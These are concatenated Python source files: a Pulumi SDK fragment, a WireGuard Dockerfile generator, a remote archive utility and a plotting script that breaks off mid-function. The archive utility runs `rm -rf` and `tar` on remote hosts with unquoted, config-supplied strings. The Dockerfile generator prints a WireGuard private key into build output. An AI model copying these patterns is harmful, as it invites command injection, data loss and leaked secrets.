return pulumi.get(self, "months_until_expiration")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def username(self) -> pulumi.Output[Optional[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
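
# A minimal usage sketch (not part of the generated SDK; the resource name and
# ID below are illustrative). It adopts already-imported state with the static
# `get` method above, using the documented import format "project_id-username".
def _example_get_existing_user():
    return X509AuthenticationDatabaseUser.get(
        "existing",
        id="1112222b3bf99403840e8934-myUsername",
    )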
8d389a141552824fec04e31d4dc97310a6a46c0f | 1,824 bytes | py | Python | client/gefyra/local/cargoimage/Dockerfile.py | gefyrahq/gefyra @ 0bc205b4b01100c640081ead671bdb195761299b | ["Apache-2.0"] | 41 stars (2022-03-24 to 2022-03-31) | issue/fork records: Schille/gefyra @ 43abd17b8ed5867a26266b5e7a5d6f9edfebab4a, 23 issues, 3 forks
# flake8: noqa
import io
import sys
def get_dockerfile(cargo_image):
    # Render the Cargo sidecar Dockerfile in memory. The Windows branch
    # additionally applies a wg-quick patch inside the image; both variants
    # write the WireGuard wg0.conf from build args.
if sys.platform == "win32":
return io.BytesIO(
f"""
FROM {cargo_image}
RUN patch /usr/bin/wg-quick /wgquick.patch
ARG ADDRESS
ARG PRIVATE_KEY
ARG DNS
ARG PUBLIC_KEY
ARG ENDPOINT
ARG ALLOWED_IPS
RUN echo '[Interface] \\n\
Address = '"$ADDRESS"' \\n\
PrivateKey = '"$PRIVATE_KEY"' \\n\
DNS = '"$DNS"' \\n\
PreUp = sysctl -w net.ipv4.ip_forward=1 \\n\
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE \\n\
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth1 -j MASQUERADE \\n\
\\n\
[Peer] \\n\
PublicKey = '"$PUBLIC_KEY"' \\n\
Endpoint = '"$ENDPOINT"' \\n\
PersistentKeepalive = 21 \\n\
AllowedIPs = '"$ALLOWED_IPS" > /config/wg0.conf
RUN cat /config/wg0.conf
""".encode(
"utf-8"
)
)
else:
return io.BytesIO(
f"""
FROM {cargo_image}
ARG ADDRESS
ARG PRIVATE_KEY
ARG DNS
ARG PUBLIC_KEY
ARG ENDPOINT
ARG ALLOWED_IPS
RUN echo '[Interface] \\n\
Address = '"$ADDRESS"' \\n\
PrivateKey = '"$PRIVATE_KEY"' \\n\
DNS = '"$DNS"' \\n\
PreUp = sysctl -w net.ipv4.ip_forward=1 \\n\
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE \\n\
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth1 -j MASQUERADE \\n\
\\n\
[Peer] \\n\
PublicKey = '"$PUBLIC_KEY"' \\n\
Endpoint = '"$ENDPOINT"' \\n\
PersistentKeepalive = 21 \\n\
AllowedIPs = '"$ALLOWED_IPS" > /config/wg0.conf
RUN cat /config/wg0.conf
""".encode(
"utf-8"
)
)
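
# A usage sketch, assuming the Dockerfile is consumed with the Docker SDK for
# Python (an assumption; gefyra's real build code may differ). The image tag
# and WireGuard values below are purely illustrative.
import docker  # hypothetical consumer dependency

def build_cargo_image_sketch():
    client = docker.from_env()
    image, _logs = client.images.build(
        fileobj=get_dockerfile("quay.io/gefyra/cargo:latest"),  # illustrative tag
        tag="gefyra-cargo:sketch",
        buildargs={
            "ADDRESS": "192.168.99.2/32",
            "PRIVATE_KEY": "<client-private-key>",
            "DNS": "192.168.99.1",
            "PUBLIC_KEY": "<server-public-key>",
            "ENDPOINT": "127.0.0.1:31820",
            "ALLOWED_IPS": "0.0.0.0/0",
        },
    )
    return image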
8d5d1187d7f404f05857a317c0c078a3e68e3acc | 2,773 bytes | py | Python | utils/archive/archive.py | jiafeiyan/xops @ fba70cc5282a040ae5f2f1266b86e12dd54edd65 | ["Apache-2.0"] | 1 star (2018-01-22) | also mirrored as jiafeiyan/my_python_util
# -*- coding: UTF-8 -*-
import sys
from utils import Configuration, parse_conf_args, rshell
def clear_after_archive(context, conf):
hosts_config = context.get("hosts")
archive_configs = conf.get("Archives")
for archive_config in archive_configs:
host_id = archive_config.get("host")
host_config = hosts_config.get(host_id)
rsh = rshell(host_config)
rsh.connect()
items = archive_config.get("items")
for item in items:
base_dir = item.get("basedir", None)
if base_dir is not None:
stdin, stdout, stderr = rsh.execute("cd %s" % (base_dir,))
error = stderr.read()
                if error != "":
sys.stderr.write("Error: %s\n" % (error,))
source_files_str = item.get("sources")
target_file_str = item.get("target")
stdin, stdout, stderr = rsh.execute("rm -rf %s" %(source_files_str,))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
rsh.disconnect()
def tar_archive(context, conf):
hosts_config = context.get("hosts")
archive_configs = conf.get("Archives")
for archive_config in archive_configs:
host_id = archive_config.get("host")
host_config = hosts_config.get(host_id)
rsh = rshell(host_config)
rsh.connect()
items = archive_config.get("items")
for item in items:
base_dir = item.get("basedir", None)
if base_dir is not None:
stdin, stdout, stderr = rsh.execute("cd %s" % (base_dir,))
error = stderr.read()
                if error != "":
sys.stderr.write("Error: %s\n" % (error,))
source_files_str = item.get("sources")
target_file_str = item.get("target")
stdin, stdout, stderr = rsh.execute("tar -czvf %s %s" %(target_file_str, source_files_str))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
rsh.disconnect()
def zip_archive(conf):
hosts_config = conf.get("hosts")
archive_config = conf.get("Archives")
archive_groups = archive_config.get("groups")
for group in archive_groups:
host_id = group.get("host")
host_config = hosts_config.get(host_id)
source_files_str = group.get("sources")
target_file_str = group.get("target")
rsh = rshell(host_config)
rsh.connect()
rsh.execute("zip -ru %s %s" %(target_file_str, source_files_str))
rsh.disconnect()
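
# A configuration sketch inferred from the accessors above; the host entry,
# paths, and the schema expected by `rshell` are assumptions for illustration.
if __name__ == "__main__":
    example_context = {"hosts": {"web-1": {"host": "10.0.0.5", "user": "ops"}}}
    example_conf = {
        "Archives": [
            {
                "host": "web-1",
                "items": [
                    {
                        "basedir": "/var/log/app",
                        "sources": "*.log",
                        "target": "/tmp/app-logs.tar.gz",
                    }
                ],
            }
        ]
    }
    # Tar up the logs, then remove the originals.
    tar_archive(example_context, example_conf)
    clear_after_archive(example_context, example_conf)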
8d9bffbd2bde85f819429801b8176f6cb51909ef | 51,408 bytes | py | Python | experiments/Plotting/plot_noise_regularization_results.py | j-geuter/CINDy @ 65144db43d461d70baaeb3252dd650a0be68f060 | ["MIT"] | 1 star (2021-11-08), 1 fork (2022-03-31)
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 1 14:51:09 2020
@author: pccom
"""
import os, sys
sys.path.append("..")
from auxiliary_functions import load_pickled_object
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
import numpy.ma as ma
from numpy.random import uniform, seed
import matplotlib as mpl
mpl.rcParams["pdf.fonttype"] = 42
mpl.rcParams["ps.fonttype"] = 42
fontsize = 19
fontsize_legend = 13
# data = load_pickled_object(os.path.join(os.getcwd(), 'results_kuramoto_L1reg.pickle'))
default_names = [
"BCG",
"BCG_constraint",
"BCG_integral",
"BCG_integral_constraint",
"CVXOPT",
"CVXOPT_constraint",
"CVXOPT_integral",
"CVXOPT_integral_constraint",
"FISTA",
"FISTA_integral",
"SINDy",
"SINDy_integral",
]
def load_files_and_compute_metrics(file_directory, algorithm_names=default_names):
# Create the structure of the dataframe with the first file
file_data = load_pickled_object(
os.path.join(file_directory, os.listdir(file_directory)[0])
)
data = {
"noise": file_data["noise"],
}
num_noise_levels = len(file_data["noise"])
exact_dynamic = file_data["exact_dynamic"]
# Compute the recovery metric for CINDy.
for file in os.listdir(file_directory):
file_data = load_pickled_object(os.path.join(file_directory, file))
exact_dynamic = file_data["exact_dynamic"]
for name in algorithm_names:
data = compute_individual_metrics(name, exact_dynamic, data, file_data)
# Training metrics on exact data
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["Y_train_data"], file_data["psi_train_data"]
)
]
if "exact_derivative_training" in data:
data["exact_derivative_training"] = np.hstack(
(data["exact_derivative_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_derivative_training"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["delta_train_data"], file_data["matrix_train_data"]
)
]
if "exact_trajectory_training" in data:
data["exact_trajectory_training"] = np.hstack(
(data["exact_trajectory_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_trajectory_training"] = np.asarray(metrics)[:, np.newaxis]
        # Validation metrics on exact data
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["Y_validation_data"], file_data["psi_validation_data"]
)
]
if "exact_derivative_validation" in data:
data["exact_derivative_validation"] = np.hstack(
(data["exact_derivative_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_derivative_validation"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["delta_validation_data"], file_data["matrix_validation_data"]
)
]
if "exact_trajectory_validation" in data:
data["exact_trajectory_validation"] = np.hstack(
(data["exact_trajectory_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_trajectory_validation"] = np.asarray(metrics)[:, np.newaxis]
return data
def compute_individual_metrics(name, exact_dynamic, data, problem_data):
metrics = [
np.linalg.norm(dynamic - exact_dynamic)
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_recovery" in data:
data[name + "_recovery"] = np.hstack(
(data[name + "_recovery"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_recovery"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm((dynamic - exact_dynamic).dot(matrix))
for dynamic, matrix in zip(
problem_data[name + "_dynamic"], problem_data["psi_validation_data"]
)
]
if name + "_derivative" in data:
data[name + "_derivative"] = np.hstack(
(data[name + "_derivative"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm((dynamic - exact_dynamic).dot(matrix))
for dynamic, matrix in zip(
problem_data[name + "_dynamic"], problem_data["matrix_validation_data"]
)
]
if name + "_trajectory" in data:
data[name + "_trajectory"] = np.hstack(
(data[name + "_trajectory"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.count_nonzero(np.multiply(exact_dynamic == 0.0, dynamic != 0.0))
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_extra" in data:
data[name + "_extra"] = np.hstack(
(data[name + "_extra"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_extra"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.count_nonzero(np.multiply(exact_dynamic != 0.0, dynamic == 0.0))
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_missing" in data:
data[name + "_missing"] = np.hstack(
(data[name + "_missing"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_missing"] = np.asarray(metrics)[:, np.newaxis]
# Training metrics
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["Y_train_data"],
problem_data["psi_train_data"],
)
]
if name + "_derivative_training" in data:
data[name + "_derivative_training"] = np.hstack(
(data[name + "_derivative_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative_training"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["delta_train_data"],
problem_data["matrix_train_data"],
)
]
if name + "_trajectory_training" in data:
data[name + "_trajectory_training"] = np.hstack(
(data[name + "_trajectory_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory_training"] = np.asarray(metrics)[:, np.newaxis]
# Validation metrics
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["Y_validation_data"],
problem_data["psi_validation_data"],
)
]
if name + "_derivative_validation" in data:
data[name + "_derivative_validation"] = np.hstack(
(data[name + "_derivative_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative_validation"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["delta_validation_data"],
problem_data["matrix_validation_data"],
)
]
if name + "_trajectory_validation" in data:
data[name + "_trajectory_validation"] = np.hstack(
(data[name + "_trajectory_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory_validation"] = np.asarray(metrics)[:, np.newaxis]
return data
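
# A standalone sketch (helper name is illustrative) of the accumulation idiom
# used above: each run contributes a column vector of metrics, and columns are
# stacked with np.hstack so data[key] has shape (num_noise_levels, num_runs).
def _append_column_sketch(store, key, metrics):
    column = np.asarray(metrics)[:, np.newaxis]
    if key in store:
        store[key] = np.hstack((store[key], column))
    else:
        store[key] = column
    return store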
def cm_to_inch(value):
return value / 2.54
def plot_stochastic(
x_axis,
list_data,
list_legend,
title,
x_label,
y_label,
colors,
markers,
log_x=True,
log_y=True,
fill_between_lines=True,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 19})
# plt.figure(figsize=(cm_to_inch(12),cm_to_inch(14)))
size_marker = 10
for i in range(len(list_data)):
mean = np.mean(list_data[i], axis=1)
std_dev = np.std(list_data[i], axis=1)
if list_legend != []:
if log_x and log_y:
plt.loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
plt.semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
plt.semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
plt.plot(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
plt.fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
plt.loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if log_x and not log_y:
plt.semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if not log_x and log_y:
plt.semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if not log_x and not log_y:
plt.plot(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if fill_between_lines:
plt.fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
plt.title(title, fontsize=fontsize)
plt.ylabel(y_label, fontsize=fontsize)
plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location, ncol=2)
else:
if outside_legend:
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
plt.grid(True, which="both")
if save_figure is None:
plt.show()
else:
if ".pdf" in save_figure:
plt.savefig(save_figure, bbox_inches="tight")
if ".png" in save_figure:
plt.savefig(save_figure, dpi=600, format="png", bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_stochastic_side_by_side(
x_axis,
list_data_left,
list_data_right,
list_legend,
title_left,
title_right,
x_label,
y_label,
colors,
markers,
linestyle_type=None,
log_x=True,
log_y=True,
fill_between_lines=True,
figure_size=None,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 20})
# plt.figure(figsize=(cm_to_inch(12),cm_to_inch(14)))
size_marker = 10
font_size_title = 30
# fig, axs = plt.subplots(1, 2, figsize=(14,7))
if figure_size is None:
fig, axs = plt.subplots(1, 2, figsize=(12, 6))
else:
fig, axs = plt.subplots(1, 2, figsize=figure_size)
# fig, axs = plt.subplots(1, 2, figsize=(10,5))
if linestyle_type is None:
linestyle_type = ["-"] * len(list_data_left)
for i in range(len(list_data_left)):
mean = np.mean(list_data_left[i], axis=1)
std_dev = np.std(list_data_left[i], axis=1)
if list_legend != []:
if log_x and log_y:
axs[0].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
axs[0].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
axs[0].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
axs[0].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
axs[0].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
axs[0].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
axs[0].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
axs[0].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
axs[0].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if fill_between_lines:
axs[0].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
for i in range(len(list_data_right)):
mean = np.mean(list_data_right[i], axis=1)
std_dev = np.std(list_data_right[i], axis=1)
if list_legend != []:
if log_x and log_y:
axs[1].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
axs[1].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
axs[1].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
axs[1].plot(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
axs[1].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
axs[1].loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
axs[1].semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
axs[1].semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
linestyle=linestyle_type[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
                axs[1].plot(
                    x_axis,
                    mean,
                    colors[i],
                    marker=markers[i],
                    linestyle=linestyle_type[i],
                    markersize=size_marker,
                    linewidth=2.0,
                )
if fill_between_lines:
axs[1].fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
for ax in axs.flat:
if x_label == "":
            ax.set_ylabel(y_label, fontsize=25)
else:
ax.set(xlabel=x_label, ylabel=y_label)
# Hide x labels and tick labels for top plots and y ticks for right plots.
for ax in axs.flat:
ax.label_outer()
if title_left != "" and title_right != "":
axs[0].set_title(title_left, fontsize=font_size_title)
axs[1].set_title(title_right, fontsize=font_size_title)
# plt.ylabel(y_label, fontsize=fontsize)
# plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location)
else:
if outside_legend:
# handles, labels = axs[1].get_legend_handles_labels()
# fig.legend(handles, labels, bbox_to_anchor=(0.85, 1.05))
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
# axs[0].set_yscale('log')
# axs[1].set_yscale('log')
axs[0].grid(True, which="both")
axs[1].grid(True, which="both")
if save_figure is None:
plt.show()
else:
if ".pdf" in save_figure:
plt.savefig(save_figure, bbox_inches="tight")
if ".png" in save_figure:
plt.savefig(save_figure, dpi=600, format="png", bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_stochastic_improvement(
x_axis,
reference_data,
list_data,
list_legend,
title,
x_label,
y_label,
colors,
markers,
log_x=True,
log_y=True,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 19})
plt.figure(figsize=(cm_to_inch(12), cm_to_inch(14)))
size_marker = 10
mean_reference = np.mean(reference_data, axis=1)
for i in range(len(list_data)):
mean = np.mean(list_data[i], axis=1)
if list_legend != []:
if log_x and log_y:
plt.loglog(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
plt.semilogx(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
plt.semilogy(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
plt.plot(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
label=list_legend[i],
)
else:
if log_x and log_y:
plt.loglog(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if log_x and not log_y:
plt.semilogx(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and log_y:
plt.semilogy(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
if not log_x and not log_y:
plt.plot(
x_axis,
np.divide(mean, mean_reference),
colors[i],
marker=markers[i],
markersize=size_marker,
linewidth=2.0,
)
plt.title(title, fontsize=fontsize)
plt.ylabel(y_label, fontsize=fontsize)
plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location)
else:
if outside_legend:
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
plt.grid(True, which="both")
if save_figure is None:
plt.show()
else:
plt.savefig(save_figure, bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_heatmaps(
x_axis,
y_axis,
list_data,
list_legend,
title,
labels,
log_x=True,
log_z=True,
log_y=False,
save_figure=None,
label_heatmap="Error (decimal log)",
color_min=None,
color_max=None,
minimum_values=None,
):
interpolation_method = "cubic"
plt.rcParams.update({"font.size": 19})
title_font_size = 19
ylabel_font_size = 15
colormap = mpl.cm.viridis
# plt.xkcd()
if log_x:
x = np.log10(x_axis.flatten())
else:
x = x_axis.flatten()
if log_y:
y = np.log10(y_axis.flatten())
else:
y = y_axis.flatten()
# define grid.
xi = np.linspace(np.min(x), np.max(x), 100)
yi = np.linspace(np.min(y), np.max(y), 100)
dict_parameters = {"fontsize": 20}
if len(list_data) == 1:
if log_z:
z_1 = np.log10(list_data[0].flatten())
else:
z_1 = list_data[0].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = np.min(zi_1)
max_val = np.max(zi_1)
fig, axs = plt.subplots(1, 1)
fig.suptitle(title)
axs.contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs.contourf(xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val)
axs.set_title(list_legend[0], fontdict=dict_parameters, position=(0.5, 0.6))
axs.xaxis.set_visible(False)
axs.set_ylabel(labels[1], fontsize=fontsize)
fig.subplots_adjust(
bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.02, hspace=0.05
)
cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
cmap = colormap
norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
cbar.ax.set_ylabel("# of contacts", rotation=270)
if len(list_data) == 2:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
min_val = min(np.min(zi_1), np.min(zi_2))
max_val = max(np.max(zi_1), np.max(zi_2))
fig, axs = plt.subplots(1, 2)
fig.suptitle(title)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].set_xlabel(labels[0], fontsize=fontsize)
axs[0].set_ylabel(labels[1], fontsize=fontsize)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
xi, yi, zi_2, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[1].text(
0.5,
0.8,
list_legend[1],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[1].transAxes,
)
axs[1].yaxis.set_visible(False)
axs[1].set_xlabel(labels[0], fontsize=fontsize)
        cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])
        cmap = colormap
        norm = mpl.colors.Normalize(vmin=min_val, vmax=max_val)
        cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cb_ax)
        cbar.ax.get_yaxis().labelpad = 15
cbar.ax.set_ylabel(label_heatmap, rotation=270)
if len(list_data) == 3:
if log_z:
z_1 = np.log10(list_data[0].flatten())
z_2 = np.log10(list_data[1].flatten())
z_3 = np.log10(list_data[2].flatten())
else:
z_1 = list_data[0].flatten()
z_2 = list_data[1].flatten()
z_3 = list_data[2].flatten()
zi_1 = griddata(
(x, y), z_1, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_2 = griddata(
(x, y), z_2, (xi[None, :], yi[:, None]), method=interpolation_method
)
zi_3 = griddata(
(x, y), z_3, (xi[None, :], yi[:, None]), method=interpolation_method
)
if color_min is None and color_max is None:
min_val = min(np.min(zi_1), np.min(zi_2), np.min(zi_3))
max_val = max(np.max(zi_1), np.max(zi_2), np.max(zi_3))
else:
min_val = color_min
max_val = color_max
fig, axs = plt.subplots(3, 1, figsize=(5, 10))
fig.suptitle(title, fontsize=title_font_size)
axs[0].contour(
xi, yi, zi_1, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax1 = axs[0].contourf(
xi, yi, zi_1, 15, cmap=colormap, vmin=min_val, vmax=max_val
)
axs[0].text(
0.5,
0.8,
list_legend[0],
fontdict=dict_parameters,
horizontalalignment="center",
transform=axs[0].transAxes,
)
axs[0].xaxis.set_visible(False)
axs[0].set_ylabel(labels[1], fontsize=ylabel_font_size)
axs[1].contour(
xi, yi, zi_2, 15, linewidths=0.5, colors="k", vmin=min_val, vmax=max_val
)
ax2 = axs[1].contourf(
